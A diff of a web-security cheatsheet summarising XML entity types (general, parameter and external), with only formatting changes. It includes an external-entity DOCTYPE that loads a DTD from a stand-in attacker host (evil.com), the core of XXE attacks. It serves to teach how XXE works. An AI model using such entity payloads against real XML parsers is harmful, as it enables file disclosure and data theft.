brianlam38/Sec-Cheatsheets/Web_Cheatsheet.md

 **Summary**

 Entity Types:
-* General entities - can be used in XML content like &name;
+* _General entities_ - can be used in XML content like &name;
   `<!ENTITY name "Hello World">`
-* Parameter entities - can be used inside doctype definition like %name; (parameter entities can insert new entities) and inside entities values like %name;.
+* _Parameter entities_ - can be used inside doctype definition like %name; (parameter entities can insert new entities) and inside entities values like %name;.
   `<!ENTITY % name "Hello World">`
   `<!ENTITY % name "Hello %myEntity;">`
-* External entities - entities with query to external (not declared in current XML document) resource (can be used both: general entities and parameter entities)
+* _External entities_ - entities with query to external (not declared in current XML document) resource (can be used both: general entities and parameter entities)
   `<!ENTITY name SYSTEM "URI/URL">`
   `<!ENTITY name PUBLIC "any_text" "URI/URL">`
-* External entities can be used for doctypes too:
+* _External entities_ - can be used for doctypes too:
   `<!DOCTYPE name SYSTEM "address.dtd" [...]>`
   `<!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">`